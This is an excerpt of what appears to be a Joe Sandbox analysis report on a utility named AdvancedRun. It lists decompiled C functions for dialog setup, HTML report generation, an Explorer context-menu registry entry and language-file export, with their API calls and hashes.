                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                  • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                  • API String ID: 3143752011-1996832678
                                                                  • Opcode ID: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                  • Instruction ID: 2e7f7f44a8c08f278b605cd2082ab28bfbf3198b566a778c3f72e8233e5ba29a
                                                                  • Opcode Fuzzy Hash: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                  • Instruction Fuzzy Hash: 2531C6B2904306A9D720EAA59D86E7E73BCDF40714F10807FF214B61C2DB7C9944D69D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 97%
                                                                  			E00403C03(void* __eflags) {
                                                                  				void* __ebx;
                                                                  				void* __ecx;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				void* _t88;
                                                                  				void* _t108;
                                                                  				void* _t113;
                                                                  				void* _t119;
                                                                  				void* _t121;
                                                                  				void* _t122;
                                                                  				void* _t123;
                                                                  				intOrPtr* _t124;
                                                                  				void* _t134;
                                                                  
                                                                  				_t113 = _t108;
                                                                  				E00403B3C(_t113);
                                                                  				E00403B16(_t113);
                                                                  				DragAcceptFiles( *(_t113 + 0x10), 1);
                                                                  				 *0x40f2f0 = SetWindowLongW(GetDlgItem( *(_t113 + 0x10), 0x3fd), 0xfffffffc, E00403A73);
                                                                  				E00402DDD( *(_t113 + 0x10), _t113 + 0x40);
                                                                  				 *(_t124 + 0x14) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x10, 0x10, 0);
                                                                  				 *((intOrPtr*)(_t124 + 0x24)) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x20, 0x20, 0);
                                                                  				SendMessageW( *(_t113 + 0x10), 0x80, 0,  *(_t124 + 0x10));
                                                                  				SendMessageW( *(_t113 + 0x10), 0x80, 1,  *(_t124 + 0x14));
                                                                  				E0040AD85(GetDlgItem( *(_t113 + 0x10), 0x402));
                                                                  				 *_t124 = 0x3ea;
                                                                  				E0040AD85(GetDlgItem(??, ??));
                                                                  				 *_t124 = 0x3f1;
                                                                  				_t116 = GetDlgItem( *(_t113 + 0x10),  *(_t113 + 0x10));
                                                                  				E004049D9(_t49, E00405B81(0x259), 0x20);
                                                                  				E004049D9(_t49, E00405B81(0x25a), 0x40);
                                                                  				E004049D9(_t116, E00405B81(0x25b), 0x80);
                                                                  				E004049D9(_t116, E00405B81(0x25c), 0x100);
                                                                  				E004049D9(_t116, E00405B81(0x25d), 0x4000);
                                                                  				E004049D9(_t116, E00405B81(0x25e), 0x8000);
                                                                  				_t117 = GetDlgItem( *(_t113 + 0x10), 0x3f5);
                                                                  				E004049D9(_t62, E00405B81(0x26c), 0);
                                                                  				E004049D9(_t62, E00405B81(0x26d), 1);
                                                                  				E004049D9(_t117, E00405B81(0x26e), 2);
                                                                  				E004049D9(_t117, E00405B81(0x26f), 3);
                                                                  				_t134 = _t124 + 0x78;
                                                                  				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x400);
                                                                  				_t119 = 1;
                                                                  				do {
                                                                  					_t17 = _t119 + 0x280; // 0x281
                                                                  					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t17), _t119);
                                                                  					_t134 = _t134 + 0xc;
                                                                  					_t119 = _t119 + 1;
                                                                  				} while (_t119 <= 9);
                                                                  				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x3fc);
                                                                  				_t121 = 1;
                                                                  				do {
                                                                  					_t21 = _t121 + 0x294; // 0x295
                                                                  					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t21), _t121);
                                                                  					_t134 = _t134 + 0xc;
                                                                  					_t121 = _t121 + 1;
                                                                  				} while (_t121 <= 3);
                                                                  				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x407);
                                                                  				_t122 = 0;
                                                                  				do {
                                                                  					_t25 = _t122 + 0x2bc; // 0x2bc
                                                                  					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t25), _t122);
                                                                  					_t134 = _t134 + 0xc;
                                                                  					_t122 = _t122 + 1;
                                                                  				} while (_t122 <= 0xd);
                                                                  				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x40c);
                                                                  				_t123 = 0;
                                                                  				do {
                                                                  					_t29 = _t123 + 0x2ee; // 0x2ee
                                                                  					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t29), _t123);
                                                                  					_t134 = _t134 + 0xc;
                                                                  					_t123 = _t123 + 1;
                                                                  					_t143 = _t123 - 3;
                                                                  				} while (_t123 < 3);
                                                                  				SendDlgItemMessageW( *(_t113 + 0x10), 0x3fd, 0xc5, 0, 0);
                                                                  				E00403EC3(GetDlgItem, _t113);
                                                                  				SetFocus(GetDlgItem( *(_t113 + 0x10), 0x402));
                                                                  				_t88 = E00402D78(_t113, _t143);
                                                                  				E00402BEE(_t113);
                                                                  				return _t88;
                                                                  			}

                                                                  APIs
                                                                    • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B5D
                                                                    • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B76
                                                                    • Part of subcall function 00403B3C: _snwprintf.MSVCRT ref: 00403B9F
                                                                    • Part of subcall function 00403B16: SetDlgItemTextW.USER32 ref: 00403B34
                                                                  • DragAcceptFiles.SHELL32(?,00000001), ref: 00403C1B
                                                                  • GetDlgItem.USER32 ref: 00403C2F
                                                                  • SetWindowLongW.USER32 ref: 00403C39
                                                                    • Part of subcall function 00402DDD: GetClientRect.USER32 ref: 00402DEF
                                                                    • Part of subcall function 00402DDD: GetWindow.USER32(?,00000005), ref: 00402E07
                                                                    • Part of subcall function 00402DDD: GetWindow.USER32(00000000), ref: 00402E0A
                                                                    • Part of subcall function 00402DDD: GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403C57
                                                                  • LoadImageW.USER32 ref: 00403C6A
                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403C72
                                                                  • LoadImageW.USER32 ref: 00403C7F
                                                                  • SendMessageW.USER32(?,00000080,00000000,?), ref: 00403C9A
                                                                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 00403CA6
                                                                  • GetDlgItem.USER32 ref: 00403CB0
                                                                    • Part of subcall function 0040AD85: GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                    • Part of subcall function 0040AD85: FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                  • GetDlgItem.USER32 ref: 00403CC2
                                                                  • GetDlgItem.USER32 ref: 00403CD4
                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                    • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                    • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                    • Part of subcall function 004049D9: SendMessageW.USER32(?,00000143,00000000,?), ref: 004049F0
                                                                    • Part of subcall function 004049D9: SendMessageW.USER32(?,00000151,00000000,?), ref: 00404A02
                                                                    • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                    • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                  • GetDlgItem.USER32 ref: 00403D64
                                                                  • GetDlgItem.USER32 ref: 00403DC0
                                                                  • GetDlgItem.USER32 ref: 00403DF0
                                                                  • GetDlgItem.USER32 ref: 00403E20
                                                                  • GetDlgItem.USER32 ref: 00403E4F
                                                                  • SendDlgItemMessageW.USER32 ref: 00403E87
                                                                  • GetDlgItem.USER32 ref: 00403E9B
                                                                  • SetFocus.USER32(00000000), ref: 00403E9E
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Item$MessageSend$HandleModuleWindow$Load$Imagememset$AcceptAddressClientDragFilesFocusFreeLibraryLongProcRectStringText_snwprintfmemcpywcscpywcslen
                                                                  • String ID:
                                                                  • API String ID: 1038210931-0
                                                                  • Opcode ID: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                  • Instruction ID: 1ad7597cb923a57af30b7376ae6fce15a7391ca9e5b6ac25faa2013acf12c195
                                                                  • Opcode Fuzzy Hash: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                  • Instruction Fuzzy Hash: D261A6B09407087FE6207F71DC47F2B7A6CEF40714F000A3ABB46751D3DABA69158A59
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 56%
                                                                  			E00407763(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                                  				signed int _v8;
                                                                  				signed int _v12;
                                                                  				intOrPtr _v16;
                                                                  				intOrPtr _v20;
                                                                  				signed int _v24;
                                                                  				signed int _v28;
                                                                  				signed int _v32;
                                                                  				void _v138;
                                                                  				long _v140;
                                                                  				void _v242;
                                                                  				char _v244;
                                                                  				void _v346;
                                                                  				char _v348;
                                                                  				void _v452;
                                                                  				void _v962;
                                                                  				signed short _v964;
                                                                  				void* __esi;
                                                                  				void* _t87;
                                                                  				wchar_t* _t109;
                                                                  				intOrPtr* _t124;
                                                                  				signed int _t125;
                                                                  				signed int _t140;
                                                                  				signed int _t153;
                                                                  				intOrPtr* _t154;
                                                                  				signed int _t156;
                                                                  				signed int _t157;
                                                                  				void* _t159;
                                                                  				void* _t161;
                                                                  
                                                                  				_t124 = __ebx;
                                                                  				_v964 = _v964 & 0x00000000;
                                                                  				memset( &_v962, 0, 0x1fc);
                                                                  				_t125 = 0x18;
                                                                  				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
                                                                  				asm("movsw");
                                                                  				_t153 = 0;
                                                                  				_v244 = 0;
                                                                  				memset( &_v242, 0, 0x62);
                                                                  				_v348 = 0;
                                                                  				memset( &_v346, 0, 0x62);
                                                                  				_v140 = 0;
                                                                  				memset( &_v138, 0, 0x62);
                                                                  				_t161 = _t159 + 0x3c;
                                                                  				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
                                                                  				_v16 =  *((intOrPtr*)(__ebx + 0x2d4));
                                                                  				if(_t87 != 0xffffffff) {
                                                                  					_push(E0040ADC0(_t87,  &_v964));
                                                                  					_push(L" bgcolor=\"%s\"");
                                                                  					_push(0x32);
                                                                  					_push( &_v244);
                                                                  					L0040B1EC();
                                                                  					_t161 = _t161 + 0x18;
                                                                  				}
                                                                  				E00407343(_t124, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
                                                                  				_v8 = _t153;
                                                                  				if( *((intOrPtr*)(_t124 + 0x2c)) > _t153) {
                                                                  					while(1) {
                                                                  						_t156 =  *( *((intOrPtr*)(_t124 + 0x30)) + _v8 * 4);
                                                                  						_v12 = _t156;
                                                                  						_t157 = _t156 * 0x14;
                                                                  						if( *((intOrPtr*)(_t157 +  *((intOrPtr*)(_t124 + 0x40)) + 8)) != _t153) {
                                                                  							wcscpy( &_v140, L" nowrap");
                                                                  						}
                                                                  						_v32 = _v32 | 0xffffffff;
                                                                  						_v28 = _v28 | 0xffffffff;
                                                                  						_v24 = _v24 | 0xffffffff;
                                                                  						_v20 = _t153;
                                                                  						_t154 = _a8;
                                                                  						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t154,  &_v32);
                                                                  						E0040ADC0(_v32,  &_v348);
                                                                  						E0040ADF1( *((intOrPtr*)( *_t154))(_v12,  *((intOrPtr*)(_t124 + 0x60))),  *(_t124 + 0x64));
                                                                  						 *((intOrPtr*)( *_t124 + 0x50))( *(_t124 + 0x64), _t154, _v12);
                                                                  						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
                                                                  							wcscpy( *(_t124 + 0x68),  *(_t157 + _v16 + 0x10));
                                                                  						} else {
                                                                  							_push( *(_t157 + _v16 + 0x10));
                                                                  							_push(E0040ADC0(_t106,  &_v964));
                                                                  							_push(L"<font color=\"%s\">%s</font>");
                                                                  							_push(0x2000);
                                                                  							_push( *(_t124 + 0x68));
                                                                  							L0040B1EC();
                                                                  							_t161 = _t161 + 0x14;
                                                                  						}
                                                                  						_t109 =  *(_t124 + 0x64);
                                                                  						_t140 =  *_t109 & 0x0000ffff;
                                                                  						if(_t140 == 0 || _t140 == 0x20) {
                                                                  							wcscat(_t109, L"&nbsp;");
                                                                  						}
                                                                  						E0040AE90( &_v32,  *((intOrPtr*)(_t124 + 0x6c)),  *(_t124 + 0x64));
                                                                  						_push( *((intOrPtr*)(_t124 + 0x6c)));
                                                                  						_push( &_v140);
                                                                  						_push( &_v348);
                                                                  						_push( *(_t124 + 0x68));
                                                                  						_push( &_v244);
                                                                  						_push( &_v452);
                                                                  						_push(0x2000);
                                                                  						_push( *((intOrPtr*)(_t124 + 0x60)));
                                                                  						L0040B1EC();
                                                                  						_t161 = _t161 + 0x28;
                                                                  						E00407343(_t124, _a4,  *((intOrPtr*)(_t124 + 0x60)));
                                                                  						_v8 = _v8 + 1;
                                                                  						if(_v8 >=  *((intOrPtr*)(_t124 + 0x2c))) {
                                                                  							goto L14;
                                                                  						}
                                                                  						_t153 = 0;
                                                                  					}
                                                                  				}
                                                                  				L14:
                                                                  				E00407343(_t124, _a4, L"</table><p>");
                                                                  				return E00407343(_t124, _a4, L"\r\n");
                                                                  			}

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                  • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                  • API String ID: 1607361635-601624466
                                                                  • Opcode ID: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                  • Instruction ID: c59e53cc54c64df10e6b193e6b6ea7c08fa255db16bc08a9aa92b01e8cbfba7b
                                                                  • Opcode Fuzzy Hash: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                  • Instruction Fuzzy Hash: C8618E31940208EFDF14AF95CC85EAE7B79FF44310F1041AAF905BA2D2DB34AA54DB99
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 40%
                                                                  			E00407B5D(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
                                                                  				void _v514;
                                                                  				char _v516;
                                                                  				void _v1026;
                                                                  				long _v1028;
                                                                  				void _v1538;
                                                                  				char _v1540;
                                                                  				void _v2050;
                                                                  				char _v2052;
                                                                  				char _v2564;
                                                                  				char _v35332;
                                                                  				char _t51;
                                                                  				intOrPtr* _t54;
                                                                  				void* _t61;
                                                                  				intOrPtr* _t73;
                                                                  				void* _t78;
                                                                  				void* _t79;
                                                                  				void* _t80;
                                                                  				void* _t81;
                                                                  
                                                                  				E0040B550(0x8a00, __ecx);
                                                                  				_v2052 = 0;
                                                                  				memset( &_v2050, 0, 0x1fc);
                                                                  				_v1540 = 0;
                                                                  				memset( &_v1538, 0, 0x1fc);
                                                                  				_v1028 = 0;
                                                                  				memset( &_v1026, 0, 0x1fc);
                                                                  				_t79 = _t78 + 0x24;
                                                                  				if(_a20 != 0xffffffff) {
                                                                  					_push(E0040ADC0(_a20,  &_v2564));
                                                                  					_push(L" bgcolor=\"%s\"");
                                                                  					_push(0xff);
                                                                  					_push( &_v2052);
                                                                  					L0040B1EC();
                                                                  					_t79 = _t79 + 0x18;
                                                                  				}
                                                                  				if(_a24 != 0xffffffff) {
                                                                  					_push(E0040ADC0(_a24,  &_v2564));
                                                                  					_push(L"<font color=\"%s\">");
                                                                  					_push(0xff);
                                                                  					_push( &_v1540);
                                                                  					L0040B1EC();
                                                                  					wcscpy( &_v1028, L"</font>");
                                                                  					_t79 = _t79 + 0x20;
                                                                  				}
                                                                  				_push( &_v2052);
                                                                  				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
                                                                  				_push(0x3fff);
                                                                  				_push( &_v35332);
                                                                  				L0040B1EC();
                                                                  				_t80 = _t79 + 0x10;
                                                                  				E00407343(_a4, _a8,  &_v35332);
                                                                  				_t51 = _a16;
                                                                  				if(_t51 > 0) {
                                                                  					_t73 = _a12 + 4;
                                                                  					_a20 = _t51;
                                                                  					do {
                                                                  						_v516 = 0;
                                                                  						memset( &_v514, 0, 0x1fc);
                                                                  						_t54 =  *_t73;
                                                                  						_t81 = _t80 + 0xc;
                                                                  						if( *_t54 == 0) {
                                                                  							_v516 = 0;
                                                                  						} else {
                                                                  							_push(_t54);
                                                                  							_push(L" width=\"%s\"");
                                                                  							_push(0xff);
                                                                  							_push( &_v516);
                                                                  							L0040B1EC();
                                                                  							_t81 = _t81 + 0x10;
                                                                  						}
                                                                  						_push( &_v1028);
                                                                  						_push( *((intOrPtr*)(_t73 - 4)));
                                                                  						_push( &_v1540);
                                                                  						_push( &_v516);
                                                                  						_push(L"<th%s>%s%s%s\r\n");
                                                                  						_push(0x3fff);
                                                                  						_push( &_v35332);
                                                                  						L0040B1EC();
                                                                  						_t80 = _t81 + 0x1c;
                                                                  						_t61 = E00407343(_a4, _a8,  &_v35332);
                                                                  						_t73 = _t73 + 8;
                                                                  						_t36 =  &_a20;
                                                                  						 *_t36 = _a20 - 1;
                                                                  					} while ( *_t36 != 0);
                                                                  					return _t61;
                                                                  				}
                                                                  				return _t51;
                                                                  			}

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: _snwprintf$memset$wcscpy
                                                                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                  • API String ID: 2000436516-3842416460
                                                                  • Opcode ID: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                  • Instruction ID: 17ce3237ebe69143205905a5a122d9f10e08837d2ebaecd13bb40ff2a02a5a8b
                                                                  • Opcode Fuzzy Hash: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                  • Instruction Fuzzy Hash: EA413371D40219AAEB20EB55CC86FAB737CFF45304F0440BAB918B6191D774AB948FA9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 51%
                                                                  			E00404415(void* __ecx, void* __eflags, intOrPtr _a4) {
                                                                  				void* _v8;
                                                                  				void* _v12;
                                                                  				void* _v24;
                                                                  				intOrPtr _v28;
                                                                  				short _v32;
                                                                  				void _v2078;
                                                                  				signed int _v2080;
                                                                  				void _v4126;
                                                                  				char _v4128;
                                                                  				void _v6174;
                                                                  				char _v6176;
                                                                  				void _v8222;
                                                                  				char _v8224;
                                                                  				signed int _t49;
                                                                  				short _t55;
                                                                  				intOrPtr _t56;
                                                                  				int _t73;
                                                                  				intOrPtr _t78;
                                                                  
                                                                  				_t76 = __ecx;
                                                                  				E0040B550(0x201c, __ecx);
                                                                  				_t73 = 0;
                                                                  				if(E004043F8( &_v8, 0x2001f) != 0) {
                                                                  					L6:
                                                                  					return _t73;
                                                                  				}
                                                                  				_v6176 = 0;
                                                                  				memset( &_v6174, 0, 0x7fe);
                                                                  				_t78 = _a4;
                                                                  				_push(_t78 + 0x20a);
                                                                  				_push(_t78);
                                                                  				_push(L"%s\\shell\\%s\\command");
                                                                  				_push(0x3ff);
                                                                  				_push( &_v6176);
                                                                  				L0040B1EC();
                                                                  				if(E00409ECC(_t76, _v8,  &_v6176,  &_v12) == 0) {
                                                                  					_t49 = E00409EF4(_v12, 0x40c4e8, _t78 + 0x414);
                                                                  					asm("sbb ebx, ebx");
                                                                  					_t73 =  ~_t49 + 1;
                                                                  					RegCloseKey(_v12);
                                                                  					_v2080 = _v2080 & 0x00000000;
                                                                  					memset( &_v2078, 0, 0x7fe);
                                                                  					E00404AD9( &_v2080);
                                                                  					if(_v2078 == 0x3a) {
                                                                  						_t55 =  *L"C:\\"; // 0x3a0043
                                                                  						_v32 = _t55;
                                                                  						_t56 =  *0x40ccdc; // 0x5c
                                                                  						_v28 = _t56;
                                                                  						asm("stosd");
                                                                  						asm("stosd");
                                                                  						asm("stosd");
                                                                  						_v32 = _v2080;
                                                                  						if(GetDriveTypeW( &_v32) == 3) {
                                                                  							_v4128 = 0;
                                                                  							memset( &_v4126, 0, 0x7fe);
                                                                  							_v8224 = 0;
                                                                  							memset( &_v8222, 0, 0x7fe);
                                                                  							_push(_a4 + 0x20a);
                                                                  							_push(_a4);
                                                                  							_push(L"%s\\shell\\%s");
                                                                  							_push(0x3ff);
                                                                  							_push( &_v8224);
                                                                  							L0040B1EC();
                                                                  							_push( &_v2080);
                                                                  							_push(L"\"%s\",0");
                                                                  							_push(0x3ff);
                                                                  							_push( &_v4128);
                                                                  							L0040B1EC();
                                                                  							E00409F1A(_t76, _v8,  &_v8224,  &_v4128);
                                                                  						}
                                                                  					}
                                                                  				}
                                                                  				RegCloseKey(_v8);
                                                                  				goto L6;
                                                                  			}

                                                                  APIs
                                                                  • memset.MSVCRT ref: 00404452
                                                                  • _snwprintf.MSVCRT ref: 00404473
                                                                    • Part of subcall function 00409ECC: RegCreateKeyExW.ADVAPI32(?,?,00000000,0040C4E8,00000000,000F003F,00000000,?,?,?,?,0040448B,?,?,?,?), ref: 00409EEC
                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,0002001F,?,?,0040390E,?), ref: 004045AB
                                                                    • Part of subcall function 00409EF4: wcslen.MSVCRT ref: 00409EF8
                                                                    • Part of subcall function 00409EF4: RegSetValueExW.ADVAPI32(004044AA,004044AA,00000000,00000001,004044AA,?,004044AA,?,0040C4E8,?,?,?,?,0002001F), ref: 00409F13
                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,0002001F,?,?,0040390E,?), ref: 004044B7
                                                                  • memset.MSVCRT ref: 004044CF
                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                  • GetDriveTypeW.KERNEL32(?), ref: 00404518
                                                                  • memset.MSVCRT ref: 00404539
                                                                  • memset.MSVCRT ref: 0040454E
                                                                  • _snwprintf.MSVCRT ref: 00404571
                                                                  • _snwprintf.MSVCRT ref: 0040458A
                                                                    • Part of subcall function 00409F1A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409F57
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$Close_snwprintf$CreateDriveFileModuleNameTypeValuewcslen
                                                                  • String ID: "%s",0$%s\shell\%s$%s\shell\%s\command$:$C:\
                                                                  • API String ID: 486436031-734527199
                                                                  • Opcode ID: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                  • Instruction ID: 27235bf79c6ca8476a2d09a82ed3c32274241934b1c07e7e02f5f4f3263a5ff1
                                                                  • Opcode Fuzzy Hash: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                  • Instruction Fuzzy Hash: A4410EB294021CFADB20DB95CC85DDFB6BCEF44304F0084B6B608F2191E7789B559BA9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 87%
E0040645E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, wchar_t* _a8) {
    void _v530;
    char _v532;
    void _v1042;
    long _v1044;
    long _v4116;
    char _v5164;
    void* __edi;
    void* _t27;
    void* _t38;
    void* _t44;
    void* _t61;      /* result of the version-info lookup; used below but left undeclared by the decompiler */

    E0040B550(0x142c, __ecx);                 /* stack probe for 0x142c bytes of locals */
    _v1044 = 0;
    memset( &_v1042, 0, 0x1fc);               /* buffer that receives the version string */
    _v532 = 0;
    memset( &_v530, 0, 0x208);                /* MAX_PATH wide-char buffer for the module path */
    E00404AD9( &_v532);                       /* path of the running module (GetModuleFileNameW, see APIs) */
    _pop(_t44);
    E00405AA7( &_v5164);
    _t27 = E0040B04D( &_v5164,  &_v532);      /* read the module's VERSIONINFO resource (GetFileVersionInfoW / VerQueryValueW, see APIs) */
    _t61 = _t27;
    if(_t27 != 0) {
        wcscpy( &_v1044,  &_v4116);           /* keep the extracted version string */
        _pop(_t44);
    }
    wcscpy(0x40fb90, _a8);                    /* global at 0x40fb90: the caller-supplied string */
    wcscpy(0x40fda0, L"general");             /* global at 0x40fda0: current section name "general" */
    E00405FAC(_t61, L"TranslatorName", 0x40c4e8, 0);   /* emit key/value pairs for the "general" section */
    E00405FAC(_t61, L"TranslatorURL", 0x40c4e8, 0);
    E00405FAC(_t61, L"Version",  &_v1044, 1);
    E00405FAC(_t61, L"RTL", "0", 0);
    EnumResourceNamesW(_a4, 4, E0040620E, 0); /* enumerate RT_MENU (4) resources through callback E0040620E */
    EnumResourceNamesW(_a4, 5, E0040620E, 0); /* enumerate RT_DIALOG (5) resources */
    wcscpy(0x40fda0, L"strings");             /* switch the section name to "strings" */
    _t38 = E00406337(_t44, _t61, _a4);
     *0x40fb90 =  *0x40fb90 & 0x00000000;     /* clear the global string again */
    return _t38;
}

APIs
• memset.MSVCRT ref: 00406484
• memset.MSVCRT ref: 004064A0
  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
  • Part of subcall function 0040B04D: GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
  • Part of subcall function 0040B04D: ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
  • Part of subcall function 0040B04D: GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
  • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
  • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
  • Part of subcall function 0040B04D: _snwprintf.MSVCRT ref: 0040B0FE
  • Part of subcall function 0040B04D: wcscpy.MSVCRT ref: 0040B128
• wcscpy.MSVCRT ref: 004064E4
• wcscpy.MSVCRT ref: 004064F3
• wcscpy.MSVCRT ref: 00406503
• EnumResourceNamesW.KERNEL32(00406602,00000004,0040620E,00000000), ref: 00406568
• EnumResourceNamesW.KERNEL32(00406602,00000005,0040620E,00000000), ref: 00406572
• wcscpy.MSVCRT ref: 0040657A
Strings
Memory Dump Source
• Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
